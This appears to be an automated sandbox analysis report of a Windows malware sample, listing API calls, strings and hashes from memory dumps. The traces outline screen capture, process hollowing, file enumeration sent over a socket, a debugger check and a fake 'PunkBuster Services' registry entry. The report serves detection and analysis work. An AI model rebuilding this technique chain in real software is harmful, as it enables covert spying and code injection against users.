                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileFind$FirstH_prologNext
                                              • String ID:
                                              • API String ID: 301083792-0
                                              • Opcode ID: 13c22fc1d0ace76c8a51299cc0d0dbe8d19a7762fa29327fab1ecc867d74f326
                                              • Instruction ID: f2fe5d25104957b25bfbc08a0063c7a3140b487ae7aedc30a75ddabd34bd1763
                                              • Opcode Fuzzy Hash: 13c22fc1d0ace76c8a51299cc0d0dbe8d19a7762fa29327fab1ecc867d74f326
                                              • Instruction Fuzzy Hash: 477132329001199BCB15EBA0DC96EED7778AF15310F14826EF916A7193EF306F49CB94
                                              APIs
                                                • Part of subcall function 00106EBF: GetLastError.KERNEL32(?,000FE260,000F931C,000FE260,?,?,000FB955,FF8BC35D), ref: 00106EC3
                                                • Part of subcall function 00106EBF: _free.LIBCMT ref: 00106EF6
                                                • Part of subcall function 00106EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00106F37
                                                • Part of subcall function 00106EBF: _abort.LIBCMT ref: 00106F3D
                                                • Part of subcall function 00106EBF: _free.LIBCMT ref: 00106F1E
                                                • Part of subcall function 00106EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00106F2B
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00110EBE
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00110F0F
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00110FCF
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorInfoLastLocale$_free$_abort
                                              • String ID:
                                              • API String ID: 2829624132-0
                                              • Opcode ID: 671e414f0ad8ff4b697d6598ad70af4202d101fbf88e2dfa7babff60085c7a21
                                              • Instruction ID: dae6909e0feade99bf21c1618b571382145b6db1980a04a29474d880a67bb169
                                              • Opcode Fuzzy Hash: 671e414f0ad8ff4b697d6598ad70af4202d101fbf88e2dfa7babff60085c7a21
                                              • Instruction Fuzzy Hash: 2A619C71940217ABDB2D9F24CD82BFAB7A8EF18300F104179FA05C6585F77499D1DB50
                                              APIs
                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,000F4403), ref: 000FA755
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,000F4403), ref: 000FA75F
                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,000F4403), ref: 000FA76C
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                              • String ID:
                                              • API String ID: 3906539128-0
                                              • Opcode ID: 46ea00d07fed2b67c38d03779cf1e4bddbb71416ea6f157909e459960eb6449b
                                              • Instruction ID: f8e422e7775bd429ede1058c2cac564da0b43ee431189a788f0886223ab6c3d6
                                              • Opcode Fuzzy Hash: 46ea00d07fed2b67c38d03779cf1e4bddbb71416ea6f157909e459960eb6449b
                                              • Instruction Fuzzy Hash: 3A31C27490121C9BCB21DF64D988BDDBBB8BF08310F5042DAE91CA7291EB349F819F45
                                              APIs
                                              • GetCurrentProcess.KERNEL32(001053F8,?,0010252A,001053F8,0012DAE0,0000000C,00102681,001053F8,00000002,00000000,?,001053F8), ref: 00102575
                                              • TerminateProcess.KERNEL32(00000000,?,0010252A,001053F8,0012DAE0,0000000C,00102681,001053F8,00000002,00000000,?,001053F8), ref: 0010257C
                                              • ExitProcess.KERNEL32 ref: 0010258E
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$CurrentExitTerminate
                                              • String ID:
                                              • API String ID: 1703294689-0
                                              • Opcode ID: 001148e16fc790fe7706febcf4cca8547556c30d03f7471c3c5269c08a392a31
                                              • Instruction ID: 04951ed884bd2014f7b69d2ec4148271dc3a88cdee79c7851596af0f987eddd3
                                              • Opcode Fuzzy Hash: 001148e16fc790fe7706febcf4cca8547556c30d03f7471c3c5269c08a392a31
                                              • Instruction Fuzzy Hash: 3DE09231004148AFCB156F54DE19AD93B69AB60355F008114F8869AAB1CBB5EE82DA94
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: .
                                              • API String ID: 0-248832578
                                              • Opcode ID: 980228290d21201ce0127c062c2106e9dc4f083a3648404de72205e1ce2db64d
                                              • Instruction ID: 0c0650649ef698c5454316cf9514202ab1731384c7620f02658c0fa67c28fe5b
                                              • Opcode Fuzzy Hash: 980228290d21201ce0127c062c2106e9dc4f083a3648404de72205e1ce2db64d
                                              • Instruction Fuzzy Hash: EE313A719002086FCB24DEB8DC84EFB7BBDDB86304F144198F999D7291E7B19D458B50
                                              APIs
                                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0010374A,?,00000004), ref: 001075EA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InfoLocale
                                              • String ID: GetLocaleInfoEx
                                              • API String ID: 2299586839-2904428671
                                              • Opcode ID: 5352fc74b8fd83687bf65a95178347af60258ae33769874f04e47a2ef207d60b
                                              • Instruction ID: 4d40a4f12f4970e5d523c49b60ebcd3f5b7da3b7685a195dd31c48bd3b76f218
                                              • Opcode Fuzzy Hash: 5352fc74b8fd83687bf65a95178347af60258ae33769874f04e47a2ef207d60b
                                              • Instruction Fuzzy Hash: 57F0F071A44608BBCB09AF64EC06FEEBB64EB08710F014164BC05262E1CBB1AE60A695
                                              APIs
                                              • FindFirstFileW.KERNEL32(00000000,?), ref: 000D8EBF
                                              • FindNextFileW.KERNEL32(00000000,?,?), ref: 000D8F8B
                                                • Part of subcall function 000DB61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,000C9F65), ref: 000DB633
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$Find$CreateFirstNext
                                              • String ID:
                                              • API String ID: 341183262-0
                                              • Opcode ID: b4e769483ad15f90620a2859f5a4e7a1585b7783587950e5a81d4475bf1c2ca6
                                              • Instruction ID: f25d1dbe581fb346e2b68b334a610c0a2011047ba21214ba44882dadb3614acc
                                              • Opcode Fuzzy Hash: b4e769483ad15f90620a2859f5a4e7a1585b7783587950e5a81d4475bf1c2ca6
                                              • Instruction Fuzzy Hash: 228120315082409BD314FB60D8A2FEFB3A5AF92710F50492DF956972D3EF309A49C752
                                              APIs
                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 000C6ADD
                                              • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 000C6BA5
                                                • Part of subcall function 000C4468: send.WS2_32(?,00000000,00000000,00000000), ref: 000C44FD
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileFind$FirstNextsend
                                              • String ID:
                                              • API String ID: 4113138495-0
                                              • Opcode ID: beab55d701883397db26ffd70b578168bad83847b07ef45cbff51548dde5e603
                                              • Instruction ID: 00fe44ae20f23dd76224f95808df376192bc3ec7ca82a27b6f72b0c814306a5a
                                              • Opcode Fuzzy Hash: beab55d701883397db26ffd70b578168bad83847b07ef45cbff51548dde5e603
                                              • Instruction Fuzzy Hash: EF2161325083005BC714FB60DD95FEFB7A8AF96360F40092DF99693193EF31AA49CA52
                                              APIs
                                                • Part of subcall function 00106EBF: GetLastError.KERNEL32(?,000FE260,000F931C,000FE260,?,?,000FB955,FF8BC35D), ref: 00106EC3
                                                • Part of subcall function 00106EBF: _free.LIBCMT ref: 00106EF6
                                                • Part of subcall function 00106EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00106F37
                                                • Part of subcall function 00106EBF: _abort.LIBCMT ref: 00106F3D
                                                • Part of subcall function 00106EBF: _free.LIBCMT ref: 00106F1E
                                                • Part of subcall function 00106EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00106F2B
                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0011110E
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$_free$InfoLocale_abort
                                              • String ID:
                                              • API String ID: 1663032902-0
                                              • Opcode ID: 9a2f9edeb6fe5ccd4b5a13e398697ef14c7346c8f49d6938ab01e3ef8c5e3189
                                              • Instruction ID: 39135fc54a4b0dd1427d1363a15158535317a15237f40e6196ddb003cc121186
                                              • Opcode Fuzzy Hash: 9a2f9edeb6fe5ccd4b5a13e398697ef14c7346c8f49d6938ab01e3ef8c5e3189
                                              • Instruction Fuzzy Hash: F1216D3291020ABBDB2CAA24DC46AFAF3A8EB15310F10417AEF01C6281EB759D94CA50
                                              APIs
                                                • Part of subcall function 00106EBF: GetLastError.KERNEL32(?,000FE260,000F931C,000FE260,?,?,000FB955,FF8BC35D), ref: 00106EC3
                                                • Part of subcall function 00106EBF: _free.LIBCMT ref: 00106EF6
                                                • Part of subcall function 00106EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00106F37
                                                • Part of subcall function 00106EBF: _abort.LIBCMT ref: 00106F3D
                                              • EnumSystemLocalesW.KERNEL32(00110E6A,00000001,00000000,?,00103CEC,?,00111497,00000000,?,?,?), ref: 00110DB4
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                              • String ID:
                                              • API String ID: 1084509184-0
                                              • Opcode ID: 6054488d857aa9dbf50391f3dc6cc6794ce6b7e9a1d040daccab8e6ae0805d5e
                                              • Instruction ID: 9b979bac908085a014aa3b98a749c29a62b889acd4ac30b9cd3a991030704f5f
                                              • Opcode Fuzzy Hash: 6054488d857aa9dbf50391f3dc6cc6794ce6b7e9a1d040daccab8e6ae0805d5e
                                              • Instruction Fuzzy Hash: 661106366047059FDB1D9F79D8915BAB7A2FF84318B14443CE98647B40D3B178C2C740
                                              APIs
                                                • Part of subcall function 00106EBF: GetLastError.KERNEL32(?,000FE260,000F931C,000FE260,?,?,000FB955,FF8BC35D), ref: 00106EC3
                                                • Part of subcall function 00106EBF: _free.LIBCMT ref: 00106EF6
                                                • Part of subcall function 00106EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00106F37
                                                • Part of subcall function 00106EBF: _abort.LIBCMT ref: 00106F3D
                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00111088,00000000,00000000,?), ref: 00111316
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$InfoLocale_abort_free
                                              • String ID:
                                              • API String ID: 2692324296-0
                                              • Opcode ID: 7d0f0c34ca825961e8760d8628f88129dae4b90fdecc4d9dd599331c4e2d8939
                                              • Instruction ID: 5c73ecb49441db6f6a173d95809437e10f16c64dfe58d040c77706cc256bc60b
                                              • Opcode Fuzzy Hash: 7d0f0c34ca825961e8760d8628f88129dae4b90fdecc4d9dd599331c4e2d8939
                                              • Instruction Fuzzy Hash: 0BF0F932A20115BBDB2C6A25CC05AFAB768FB40764F050439ED15A3684EB70FDC1C6D0
                                              APIs
                                                • Part of subcall function 00106EBF: GetLastError.KERNEL32(?,000FE260,000F931C,000FE260,?,?,000FB955,FF8BC35D), ref: 00106EC3
                                                • Part of subcall function 00106EBF: _free.LIBCMT ref: 00106EF6
                                                • Part of subcall function 00106EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00106F37
                                                • Part of subcall function 00106EBF: _abort.LIBCMT ref: 00106F3D
                                              • EnumSystemLocalesW.KERNEL32(001110BA,00000001,?,?,00103CEC,?,0011145B,00103CEC,?,?,?,?,?,00103CEC,?,?), ref: 00110E29
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                              • String ID:
                                              • API String ID: 1084509184-0
                                              • Opcode ID: 094ad126bb36dd16fb227b004750e3144d780b2647249fcfee7fc643f9f1df0b
                                              • Instruction ID: 3cff079c78db5692ae750d19ebfbef9de75b9dfcc2d5a2907283e2a273d7b153
                                              • Opcode Fuzzy Hash: 094ad126bb36dd16fb227b004750e3144d780b2647249fcfee7fc643f9f1df0b
                                              • Instruction Fuzzy Hash: 05F022366003045FDB1A5F7ADC81AAA7B91EF84328B05843CFA418B680D3B1ACC2C650
                                              APIs
                                                • Part of subcall function 00104ACC: EnterCriticalSection.KERNEL32(-0003D155,?,0010225B,00000000,0012DAC0,0000000C,00102216,?,?,?,00108739,?,?,00106F74,00000001,00000364), ref: 00104ADB
                                              • EnumSystemLocalesW.KERNEL32(00107068,00000001,0012DC48,0000000C), ref: 001070E6
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                              • String ID:
                                              • API String ID: 1272433827-0
                                              • Opcode ID: 69203375e2be55c29dca55b7fbc333518e0a78027ef946f7934092123617d1f8
                                              • Instruction ID: 544671ac8221c3708f7d80184223e7edf72c779b1538cf6dd6b965abab19e1d7
                                              • Opcode Fuzzy Hash: 69203375e2be55c29dca55b7fbc333518e0a78027ef946f7934092123617d1f8
                                              • Instruction Fuzzy Hash: 70F06D72A10204EFDB05EF78E846B9D77F0EB09720F108219F510DB6E2CBB49985DB41
                                              APIs
                                                • Part of subcall function 00106EBF: GetLastError.KERNEL32(?,000FE260,000F931C,000FE260,?,?,000FB955,FF8BC35D), ref: 00106EC3
                                                • Part of subcall function 00106EBF: _free.LIBCMT ref: 00106EF6
                                                • Part of subcall function 00106EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00106F37
                                                • Part of subcall function 00106EBF: _abort.LIBCMT ref: 00106F3D
                                              • EnumSystemLocalesW.KERNEL32(00110C4E,00000001,?,?,?,001114B9,00103CEC,?,?,?,?,?,00103CEC,?,?,?), ref: 00110D2E
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                              • String ID:
                                              • API String ID: 1084509184-0
                                              • Opcode ID: ac5909e0ee12e7517ac11b5ecbf0748e59c8644b2240c0e203d6ea200cb91409
                                              • Instruction ID: 911b74ec1920a81aee54396468e0ecda0bbf81715a805835c5270b93e493d1da
                                              • Opcode Fuzzy Hash: ac5909e0ee12e7517ac11b5ecbf0748e59c8644b2240c0e203d6ea200cb91409
                                              • Instruction Fuzzy Hash: 4EF0E53A70020557CB1AAF75EC557AA7F95EFC5750B0740A9EA098B790C7B1A8C3CBA0
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,000F39B1), ref: 000F3CDC
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: bc6e26fc5698c13ef6de70dd63ab622d4a06cf204ce3de8bb92095cdc028a0a1
                                              • Instruction ID: ee8600c23808b2f69a73c07016f8567af36f7491015584c7c93db7f445a19e21
                                              • Opcode Fuzzy Hash: bc6e26fc5698c13ef6de70dd63ab622d4a06cf204ce3de8bb92095cdc028a0a1
                                              • Instruction Fuzzy Hash:
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: HeapProcess
                                              • String ID:
                                              • API String ID: 54951025-0
                                              • Opcode ID: 3f6e3fda3b5aad93b6d827c5f833fbbd3672801bafcb673eebefa34d3da0169b
                                              • Instruction ID: 19261bbff854fd5fdfcb543270669b7d10bd812551fd546c859259a3edc6afa6
                                              • Opcode Fuzzy Hash: 3f6e3fda3b5aad93b6d827c5f833fbbd3672801bafcb673eebefa34d3da0169b
                                              • Instruction Fuzzy Hash: 1AA01230102201CB93004F315F0524936A96705181300C014A005C1A60DA2040C04600
                                              APIs
                                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 000D7FB9
                                              • CreateCompatibleDC.GDI32(00000000), ref: 000D7FC4
                                                • Part of subcall function 000D8452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 000D8482
                                              • CreateCompatibleBitmap.GDI32(?,00000000), ref: 000D8045
                                              • DeleteDC.GDI32(?), ref: 000D805D
                                              • DeleteDC.GDI32(00000000), ref: 000D8060
                                              • SelectObject.GDI32(00000000,00000000), ref: 000D806B
                                              • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 000D8093
                                              • GetIconInfo.USER32(?,?), ref: 000D80CB
                                              • DeleteObject.GDI32(?), ref: 000D80FA
                                              • DeleteObject.GDI32(?), ref: 000D8107
                                              • DrawIcon.USER32(00000000,?,?,?), ref: 000D8114
                                              • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 000D8144
                                              • GetObjectA.GDI32(?,00000018,?), ref: 000D8173
                                              • LocalAlloc.KERNEL32(00000040,00000028), ref: 000D81BC
                                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 000D81DF
                                              • GlobalAlloc.KERNEL32(00000000,?), ref: 000D8248
                                              • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 000D826B
                                              • DeleteDC.GDI32(?), ref: 000D827F
                                              • DeleteDC.GDI32(00000000), ref: 000D8282
                                              • DeleteObject.GDI32(00000000), ref: 000D8285
                                              • GlobalFree.KERNEL32(00CC0020), ref: 000D8290
                                              • DeleteObject.GDI32(00000000), ref: 000D8344
                                              • GlobalFree.KERNEL32(?), ref: 000D834B
                                              • DeleteDC.GDI32(?), ref: 000D835B
                                              • DeleteDC.GDI32(00000000), ref: 000D8366
                                              • DeleteDC.GDI32(?), ref: 000D8398
                                              • DeleteDC.GDI32(00000000), ref: 000D839B
                                              • DeleteObject.GDI32(?), ref: 000D83A1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
                                              • String ID: DISPLAY
                                              • API String ID: 1765752176-865373369
                                              • Opcode ID: 4db0d775fed252b876c7cffa8fcb056294ce311c28e6bec0e592b099bcfbfffa
                                              • Instruction ID: c36b3caf3f3399118b5f0f1f010a917749b42fb1f6c846ecb6b822544c709916
                                              • Opcode Fuzzy Hash: 4db0d775fed252b876c7cffa8fcb056294ce311c28e6bec0e592b099bcfbfffa
                                              • Instruction Fuzzy Hash: 8FC16D71508344AFD764DB24DC44BABBBF9FF89700F04891EF589936A1EB30A945CB61
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 004073EF
                                              • GetSystemDirectoryA.KERNEL32(?,00000400), ref: 00407463
                                                • Part of subcall function 004BC79F: __lock.LIBCMT ref: 004BC7BD
                                                • Part of subcall function 004BC79F: HeapFree.KERNEL32(00000000,?,0050EE00,0000000C,004C280D,00000000,0050F518,00000008,004C2842,?,?,?,004BD45A,00000004,0050EE80,0000000C), ref: 004BC804
                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall\PunkBusterSvc\,00000000,000F003F,?), ref: 00407555
                                              • RegCreateKeyA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall\PunkBusterSvc\,?), ref: 00407568
                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall\PunkBusterSvc\,00000000,000F003F,?), ref: 0040757D
                                              • _strlen.LIBCMT ref: 004075A3
                                              • RegSetValueExA.ADVAPI32(?,UninstallString,00000000,00000002,?,00000001), ref: 004075C8
                                              • _strlen.LIBCMT ref: 004075D0
                                              • RegSetValueExA.ADVAPI32(?,DisplayName,00000000,00000002,PunkBuster Services,00000001), ref: 004075E7
                                              • _strlen.LIBCMT ref: 0040760D
                                              • RegSetValueExA.ADVAPI32(?,DisplayVersion,00000000,00000002,?,00000001), ref: 0040762C
                                              • _strlen.LIBCMT ref: 00407634
                                              • RegSetValueExA.ADVAPI32(?,HelpLink,00000000,00000002,http://www.evenbalance.com/index.php?page=pbsvcfaq.php,00000001), ref: 0040764B
                                              • _strlen.LIBCMT ref: 0040764E
                                              • RegSetValueExA.ADVAPI32(?,URLInfoAbout,00000000,00000002,http://www.evenbalance.com/index.php?page=pbsvcfaq.php,00000001), ref: 00407665
                                              • _strlen.LIBCMT ref: 0040766D
                                              • RegSetValueExA.ADVAPI32(?,Publisher,00000000,00000002,Even Balance, Inc.,00000001), ref: 00407684
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Value_strlen$Open$CreateDirectoryFreeH_prologHeapSystem__lock
                                              • String ID: -u$%d.%d$DisplayName$DisplayVersion$Even Balance, Inc.$HelpLink$Publisher$PunkBuster Services$Software\Microsoft\Windows\CurrentVersion\Uninstall\PunkBusterSvc\$URLInfoAbout$UninstallString$http://www.evenbalance.com/index.php?page=pbsvcfaq.php
                                              • API String ID: 1366487629-2471671963
                                              • Opcode ID: 3f66010ca4bbd8cec7424b12d3089067c989c62d95de6c32389d2ecf475b48bc
                                              • Instruction ID: 3b5f2e55fd99b0cb6fb53e510ead61fc6bd0a11c4e949306d876edae8efe3064
                                              • Opcode Fuzzy Hash: 3f66010ca4bbd8cec7424b12d3089067c989c62d95de6c32389d2ecf475b48bc
                                              • Instruction Fuzzy Hash: 9071A27194015CBADB21AB618C82EEE77BCEF44704F1080BBB545B6192CE785E818FE8
                                              APIs
                                              • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 000D728C
                                              • GetProcAddress.KERNEL32(00000000), ref: 000D728F
                                              • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 000D72A0
                                              • GetProcAddress.KERNEL32(00000000), ref: 000D72A3
                                              • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 000D72B4
                                              • GetProcAddress.KERNEL32(00000000), ref: 000D72B7
                                              • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 000D72C8
                                              • GetProcAddress.KERNEL32(00000000), ref: 000D72CB
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 000D736C
                                              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 000D7384
                                              • GetThreadContext.KERNEL32(?,00000000), ref: 000D739A
                                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 000D73C0
                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 000D7440
                                              • TerminateProcess.KERNEL32(?,00000000), ref: 000D7454
                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 000D748B
                                              • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 000D7558
                                              • SetThreadContext.KERNEL32(?,00000000), ref: 000D7575
                                              • ResumeThread.KERNEL32(?), ref: 000D7582
                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 000D759A
                                              • GetCurrentProcess.KERNEL32(?), ref: 000D75A5
                                              • TerminateProcess.KERNEL32(?,00000000), ref: 000D75BF
                                              • GetLastError.KERNEL32 ref: 000D75C7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                              • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                              • API String ID: 4188446516-3035715614
                                              • Opcode ID: c32eb69a9546f16c343edffaee0097b64c156beba7a90c65ad867a99d4f5c2a8
                                              • Instruction ID: ce7e315ee516b2cf22fd63988fe02fa68f77620a1a9ba0b4e2764ad6468f2c9f
                                              • Opcode Fuzzy Hash: c32eb69a9546f16c343edffaee0097b64c156beba7a90c65ad867a99d4f5c2a8
                                              • Instruction Fuzzy Hash: E5A18DB1508304AFD7509F61DC49B6BBBF8FF48344F44482AF649C26A1E7B1E954CB62
